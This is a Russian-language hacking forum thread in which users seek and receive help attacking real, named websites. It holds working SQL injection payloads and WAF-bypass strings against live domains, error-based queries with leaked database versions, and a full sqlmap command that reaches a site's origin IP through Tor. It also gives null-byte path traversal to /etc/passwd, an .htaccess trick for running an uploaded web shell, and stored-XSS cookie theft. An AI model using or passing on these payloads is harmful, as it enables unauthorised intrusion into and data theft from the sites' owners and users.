[18:43:19] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:43:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:43:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:43:25] [INFO] target URL appears to be UNION injectable with 3 columns
[18:43:25] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))iyJH)"},"tab":"growth"}

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 UNION ALL SELECT CONCAT(0x7170786b71,0x697a4b487962727759494a414871 686b654176576663644e4b55574770616b786a66626f617a6d 47,0x716b707871),NULL,NULL-- -"},"tab":"growth"}
---
[18:43:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.15
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)





Duble said:
↑ (https://antichat.live/posts/4451356/)
Добрый день, подскажите пожалуйста.
Есть сайт, уязвимость в json нашел с помощью acunetix
Отчет такой

Code:
POST site.com/api/R/countTabs HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAj wObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;n oAuthLanguage=%7B%22languageId%22%3A2%2C%22languag eName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec 41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken= uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZ kYF91wKftnxCcS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host:site.com
Connection: Keep-alive

{"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}

Так вот, чем крутить такое? Точнее через что?


Можно было просто взять пакет запроса с акунектикса, в уязвимом параметре поставить звездочку, сохранить в файл и вызвать его параметром -r file.txt

Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:


Code:
products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23

Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.

Всем заранее спасибо!

Samozvanec said:
↑ (https://antichat.live/posts/4451819/)
Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:

Code:
products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23

Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.
Всем заранее спасибо!


В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос


Code:
id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23

и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.

В конце концов выйдет так:


Code:
24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#

Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..

fandor9 said:
↑ (https://antichat.live/posts/4452026/)
В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос

Code:
id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23

и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.
В конце концов выйдет так:

Code:
24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#

Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..


Надо же, как всё тривиально! И как же я сам до этого не додумался! Спасибо огромное за ответ!

Доброго времени суток. Столкнулся с проблемой при загрузке шелла.

На сайте есть функция загрузки аватарки, в запросе можно подменить расширение файла на какое угодно. Файл успешно грузится на сервак, но при переходе по ссылке он открывается как пикча (как ссылка внутри тега img), какое бы расширение я не выбрал. В ответе сервер возвращает content type image/jpeg (или тот, биты которого я подставляю в пэйлоад). Подмена mime type в реквесте на отличное от gif/png/jpeg не дает залить файл.

Как можно запустить код эксплойта?

Сервер: nginx

Попробуй залить .htaccess с разрешение на пхп

Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT


Code:
www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6 ,7--+-

PS

waf обошел,


Code:
http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-

но не могу спровоцировать вывод уязвимых полей

Всем привет!


Code:
$page = isset($_GET['lang']) ? $_GET['lang'] : 'default';
if (! is_file('./language/'.$page.'/language.php')) {
$page = 'default';
}
require_once './language/default/language.php';
if ('default' != $page) {
include_once './language/'.$page.'/language.php';
}

Php version 5.3.6


Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?

WallHack said:
↑ (https://antichat.live/posts/4452956/)
Всем привет!
Php version
5.3.6

Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?


Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00

Samozvanec said:
↑ (https://antichat.live/posts/4452655/)
Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT

Code:
www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6 ,7--+-

PS
waf обошел,

Code:
http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-

но не могу спровоцировать вывод уязвимых полей


Error-Based например:


Code:
http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-



Code:
XPATH syntax error: ':5.5.65-MariaDB'
Agent Code Is Invalid

winstrool said:
↑ (https://antichat.live/posts/4452963/)
Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00


Спасибо за ответ!

Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало

Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то

joelblack said:
↑ (https://antichat.live/posts/4452968/)
Error-Based например:

Code:
http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-


Code:
XPATH syntax error: ':5.5.65-MariaDB'
Agent Code Is Invalid




Огромное спасибо!

WallHack said:
↑ (https://antichat.live/posts/4452970/)
Спасибо за ответ!
Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало
Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то


Фикс был внутри версии 5.3.3, в 5.3.3.7 еще работал, в 5.3.3.8 уже нет.

Samozvanec said:
↑ (https://antichat.live/posts/4453863/)
Понимаю, что уже наверное достал постить в этой ветке что-то однотипное


Всё в порядке. Тема как раз создавалась для подобных однотипных вопросов, а ваше упорство в попытках постигнуть истинную суть инъекций заслуживает похвалы. Текущее поколение кулхацкеров, скульмаперов и метасплоитеров, тоска жуткая


Samozvanec said:
↑ (https://antichat.live/posts/4453863/)
но вот проблема, третий день бьюсь и не могу шагнуть дальше количества колонок. И не понятно, Blind это или нет. Функции Case, Substr, Mid и оператор like, в том числе и ASCII результата не принесли (по крайней мере в моих кривых рученках).


Иногда полезно какое-то время уделить разработке. С оптытом, придёт понимание абстрактных внутренних процессов и можно будет с большой вероятностью предположить, в какой части логики находится уязвимость и какого рода она может быть. Сходу, смею вангануть, что инъекция находится в запросе выборки категории, по ID которой в дальнейшем будут выбираться позиции для листинга. Следовательно, если нет вывода ошибок, с большой вероятностью можем предположить лишь булевой вариант. Простейшим выходом в данном случае, будет считывание текущего запроса из INFORMATION_SCHEMA.PROCESSLIST вслепую, чтоб точно подтверить/опровергнуть теорию.

На правах старорега, хотелось бы добавить, что лично я, вообще не поддерживаю раскрутки подобных уязвимостей на чужих площадках публично, дебилов в наше время хватает, поверьте. Но дело каждого, на свой страх и риск как говорится. По поводу же РУ/СНГ ресурсов, вообще есть негласное правило, что их следует стараться обходить стороной, по многим причинам, которые заслуживают отдельного обсуждения, а скорее всего холивара Поэтому, настоятельно рекомедую переварить и принять к сведению полученную информацию. Чтоб закрыть вопрос с этим кейсом, взглянул одним глазком, имеет место неопределённое поведение, но инъекции нет.

Помогите ваф обойти, фильтрует юнион селект


Code:
http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+uion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80, 81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27

DezMond™ said:
↑ (https://antichat.live/posts/4455162/)
Помогите ваф обойти, фильтрует юнион селект




Code:
http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+union+distinct+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27

Не пойму вафа нету, скуля слепая, но скулмап не раскручивает( в чем трабла?


Code:
https://www.akbw.de/nc/veranstaltungen/veranstaltungskalender-architekturtreff.html?no_cache=1&tx_fufevents_pi1%5Bsearch%5D%5Borganizer%5D=35110

Помогите ваф обойти, фильтрует и юнион и селект


Code:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+

DezMond™ said:
↑ (https://antichat.live/posts/4461986/)
Помогите ваф обойти, фильтрует и юнион и селект

Code:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+





Code:
914+||+(select mid(@@version,1,1)=5)+--+-

DezMond™ said:
↑ (https://antichat.live/posts/4461986/)
Помогите ваф обойти, фильтрует и юнион и селект

Code:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+



Тут надо клоуд обходить, смотрим ип через DNS history:

____viewdns.info/iphistory/?domain=baslerhofmann.ch

Там будет такая запись:


5.148.171.143
Switzerland Nine Internet Solutions AG, Switzerland 2020-12-21


Далее просто направляем скульмап и радуемся жизни:


sqlmap --url="
https://5.148.171.143/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914* (https://5.148.171.143/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914*)
" --host="
www.baslerhofmann.ch (http://www.baslerhofmann.ch)
" --random-agent --tor --tor-port=9150 --tor-type=SOCKS5 --threads=10 --dbms=Mysql --dbs --batch


Итого, что мы имеем:


---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
https://5.148.171.143:443/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914
AND 5542=5542
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
https://5.148.171.143:443/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914
AND (SELECT 2193 FROM (SELECT(SLEEP(10)))xYPO)
---

подскажите пожалуйста

окунь нашел такую скулю: https://site.com/tr/news-tr/wp2-0-d'|a|'efi-surumu/

мап ничего не находит

Здравствуйте, есть шахматная программа, которая требует онлайн-активации. Выяснил, что при вводе 25-значного ключа в программу, активация проходит с помощью проверки данного ключа вот по этому адресу: http://chess-cheat.com/test.php . При каждом обновлении данной страницы в браузере генерируется MD5 хеш 6-ти значных чисел и еще какие-то случайные цифры. Есть ли какие-то мысли об уязвимости?

Qweasdzxc1 said:
↑ (https://antichat.live/posts/4464882/)
подскажите пожалуйста
окунь нашел такую скулю:
https://site.com/tr/news-tr/wp2-0-d'|a|'efi-surumu/
мап ничего не находит


Поиграть руками с логикой. Вероятно это и не скуля вообще, а нестандартное поведение которое и задетектил ваш софт приняв это за sql-injection

Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...


Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160



Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+ select+111,222+--+

DezMond™ said:
↑ (https://antichat.live/posts/4478792/)
Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...

Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160


Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+ select+111,222+--+



Тут только слепая

tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+and+if ((select+count(*)+from+information_schema.tables+l imit+0,1)=307,1,2)=1+--+

Помогите, что можно сделать? вывод в коде


Code:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262



Code:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi

help to inject here "from admin"

return=&username=sdsadssda%27+or+1+group+by+mid(user(),ran d(0))having+avg(0)%23&password=dsadsada

return=&username=sdsadssda%27+or+1+group+by+mid(user(),ran d(0) from admin)having+avg(0)%23&password=dsadsada doesn't work

DezMond™ said:
↑ (https://antichat.live/posts/4481636/)
Помогите, что можно сделать? вывод в коде

Code:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262


Code:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi



Немного извращенно, но работать будет

/poi/extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262


Code:
XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'' (46 chars)



eminlayer7788 said:
↑ (https://antichat.live/posts/4481699/)
help to inject here "from admin"
return=&username=sdsadssda%27+or+1+group+by+mid(user(),ran d(0))having+avg(0)%23&password=dsadsada
return=&username=sdsadssda%27+or+1+group+by+mid(user(),ran d(0) from admin)having+avg(0)%23&password=dsadsada doesn't work


we are need full url for understanding filters

help for sql injection

.SpoilerTarget" type="button">Spoiler: sqli link
https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1%27group%20by%20mid(user()%20from%20floor(r and(0)*2))having%20avg(0)--%20-

How to get table & column names ?

Thanks for help !

Hi !

This is sqli ?

.SpoilerTarget" type="button">Spoiler: sqli link
https://www.petekamutner.am/covidNews.aspx?sid=src&nid=8025

Thank !

Как обойти where?


Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and/**/(extractvalue/*a*/(0,concat/**//*a*/(0,(select/**//*a*/(uid)from(be_users)where(admin=1)))))%23

Здравствуйте нужен совет. Сайт - БД User pass есть как найти там админа на сайте есть admin.php и форум, модера нашел тупо по нейму слил User_name . Куда копать где его искать ? Брутить? не все слил ибо слепая....

Chachavar said:
↑ (https://antichat.live/posts/4483898/)
Здравствуйте нужен совет. Сайт - БД User pass есть как найти там админа на сайте есть admin.php и форум, модера нашел тупо по нейму слил User_name . Куда копать где его искать ? Брутить? не все слил ибо слепая....


что за форум? обычно админ id=1

Сайт при нем форум в admin.php вбиваеш что либо не че не показывает за что зацепиться для брута либо я туплю уже. имеете виду в БД первый admin в таблице users? в панеле admin.php написанно не логин а ID Админа

походу две базы на сайте msql и mssql такое возможно? сильно не пинать....

Есть input в , могу выйти из атрибута инпута добавить onclick и сделать XSS(за пределы input не могу выйти), но форма настроена на авто .submit могу я анулировать отправку формы или без вариантов?

Что можно сделать с этой скулей?


Code:
https://www.aric.de/datenbanken/online_recherche/?no_cache=1&schlagwort_mit2=44&schlagwort_ohne=435&suchen=Suchen

есть слепая инъекция в influxdb вида history?name=alex'%20or%201=1-- Кто нибудь знает как в этой субд раскрутить слепую скулю или вывести хоть какие то нужные данные? help please

Приветствую всех. Нахожу постоянно уязвимости типа

CVE-2020-11023

CVE-2020-11022

CVE-2015-9251

CVE-2019-11358

Уже не пинайте сильно новичка, а как воспользоваться этим видом уязвимостей. Вроде можно получить удалённый доступ к машине и вебсайту. Но в поиске ничего толкового найти не могу

avitodebit said:
↑ (https://antichat.live/posts/4491877/)
CVE-2020-11023
CVE-2020-11022
CVE-2015-9251
CVE-2019-11358


Ни одна из уязвимостей не позволяет получить удалённого доступа (RCE). Все уязвимости касаются клиентских JS библиотек. Которые, в теории, при определённом стечении обстоятельств, позволят провести XSS атаку (https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг). Что позволит атаковать администратора для дальнейшего продвижения к цели.

Hi

Any method/exploit for PHP 5.6.40 safe mode bypass ?

Thanks !

Может кто-нибудь пролить файл через phpmyadmin 3.3.7 ? Нужна любая полезная информация, за вознаграждение

Подскажите реально ли что-то сделать в таком случае?


Code:
$ch = curl_init('http://site.com/page.php?file='.$_GET['file']);

eminlayer7788 said:
↑ (https://antichat.live/posts/4493275/)
Hi
Any method/exploit for PHP 5.6.40 safe mode bypass ?
Thanks !


Apache or Nginx?


holdik said:
↑ (https://antichat.live/posts/4494072/)
Может кто-нибудь пролить файл через phpmyadmin 3.3.7 ? Нужна любая полезная информация, за вознаграждение


Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь https://rdot.org/forum/showthread.php?t=286


1NtR0 said:
↑ (https://antichat.live/posts/4495480/)

Code:
$ch = curl_init('http://site.com/page.php?file='.$_GET['file']);



Думаю, что ничего интересного.

crlf said:
↑ (https://antichat.live/posts/4495487/)
Apache or Nginx?
Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь
https://rdot.org/forum/showthread.php?t=286
Думаю, что ничего интересного.


Apache

eminlayer7788 said:
↑ (https://antichat.live/posts/4495499/)
Apache


This exploit (https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) can be modified, but requires low level skills. Unfortunately, I haven't seen any simple bypasses.

помогите раскрутить


Code:
https://www.egtexpress.com/ru/country/slovinsko"/

DezMond™ said:
↑ (https://antichat.live/posts/4496131/)
помогите раскрутить

Code:
https://www.egtexpress.com/ru/country/slovinsko"/





Code:
/ru/country/slovinsko"and(extractvalue(1,concat(0x3a,(select@@version))) )="1/



Code:
XPATH syntax error: ':10.0.35-MariaDB

Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении.

Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут.

Подскажите пожалуйста , где можно на русском языке найти информацию по IMP4GT (https://t.co/7b3esmeUgD?amp=1)?

Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники.

Заранее спасибо.

dread3nergy said:
↑ (https://antichat.live/posts/4497103/)
Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении.
Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут.
Подскажите пожалуйста , где можно на русском языке найти информацию по
IMP4GT (https://t.co/7b3esmeUgD?amp=1)
?
Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники.
Заранее спасибо.


Ну на сайте стоит (https://imp4gt-attacks.net/#results) что использовался стек srsLTE (https://www.srslte.com/download), ну и к тому же понадобится как минимум SDR который работает на частотах LTE (например limeSDR (https://limemicro.com/products/boards/limesdr/)), хотя конкретно они использовали 2х Ettus USRP B210 (https://www.ettus.com/all-products/ub210-kit/) (глава V.Setup)

eminlayer7788 said:
↑ (https://antichat.live/posts/4498012/)
sql injection ?


nope

Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь.

Нашёл уязвимость на сайте своего друга, следующего вида:


Code:
Text' -->">'>'"

Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки.

На выходе получаю:

.SpoilerTarget" type="button">Spoiler: ScreenShot
https://i.ibb.co/PNzbrXM/2.png

Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки:


Code:
New York' -->">

'>'"

Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел.

Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.

signlog said:
↑ (https://antichat.live/posts/4498258/)
Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь.
Нашёл уязвимость на сайте своего друга, следующего вида:

Code:
Text' -->">'>'"

Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки.
На выходе получаю:
Spoiler: ScreenShot
https://i.ibb.co/PNzbrXM/2.png
Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки:

Code:
New York' -->">

'>'"

Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел.
Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.


Hi

See what the status code in response with burp suite

signlog said:
↑ (https://antichat.live/posts/4498258/)
Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь.
Нашёл уязвимость на сайте своего друга, следующего вида:

Code:
Text' -->">'>'"

Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки.
На выходе получаю:
Spoiler: ScreenShot
https://i.ibb.co/PNzbrXM/2.png
Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки:

Code:
New York' -->">

'>'"

Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел.
Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.



одной формы загрузки мало, у формы должен быть загрузчик, ты указал в поле action адрес, выходит логика такая что твоя форма отсылает на "морду" файл, но если в исходнике нет обработчика то ничего не произойдет. Судя по всему там хранимая XSS которую можно подсунуть админу и попробовать украсть куки авторизации и попасть в админку, либо сменить вектор атаки и попробовать найти в данных полях формы SQL INJ

есть уязвимый параметр в body payload для post запроса, но не могу понять как использовать union select. при ошибки синтаксиса, я ее не вижу, но в таком случае возвращается пустая страница

возвращает полностью все с таблицы


Code:
month=8&year=2022 or 1=1 -- -

возвращает пустую страницу => ошибка


Code:
month=8&year=2022 order by 2 -- -


возвращает разметку. значит в запросе 1 колонка


Code:
month=8&year=2022 order by 1 -- -


пытаюсь сделать union based атаку. пустая страница => ошибка


Code:
month=8&year=2022 union select 1 -- -

поле которое есть в основном запросе это id, потому что такой запрос проходит


Code:
month=8&year=2022 order by id -- -

скорей всего это подзапрос, или результат передается в другой

используя технику с сравнением ascii могу достать данные, но это очень долго. есть возможность как то внедрить union select?

FireRidlle said:
↑ (https://antichat.live/posts/4502218/)
есть уязвимый параметр в body payload для post запроса, но не могу понять как использовать union select. при ошибки синтаксиса, я ее не вижу, но в таком случае возвращается пустая страница
возвращает полностью все с таблицы

Code:
month=8&year=2022 or 1=1 -- -

возвращает пустую страницу => ошибка

Code:
month=8&year=2022 order by 2 -- -

возвращает разметку. значит в запросе 1 колонка

Code:
month=8&year=2022 order by 1 -- -

пытаюсь сделать union based атаку. пустая страница => ошибка

Code:
month=8&year=2022 union select 1 -- -

поле которое есть в основном запросе это id, потому что такой запрос проходит

Code:
month=8&year=2022 order by id -- -

скорей всего это подзапрос, или результат передается в другой
используя технику с сравнением ascii могу достать данные, но это очень долго. есть возможность как то внедрить union select?


sqlmap

FireRidlle said:
↑ (https://antichat.live/posts/4502218/)
есть возможность как то внедрить union select?


Годы идут, а вопросы всё теже /threads/424557/page-142#post-4388089 (https://antichat.live/threads/424557/page-142/)

Есть Open Redirect там же xss

site.com/login?next=asdfg

в ответ получаю

Location: asdfg

Found. Redirecting to asdfg

Принимает javascript:alert() но Location все портит, нужно этот Redirect сломать что бы все сработало.

Пробовал варианты из таблицы https://habr.com/ru/company/pt/blog/247709/ но редирект даже если не происходит ответ мне не показывает.

Есть что то актуальное?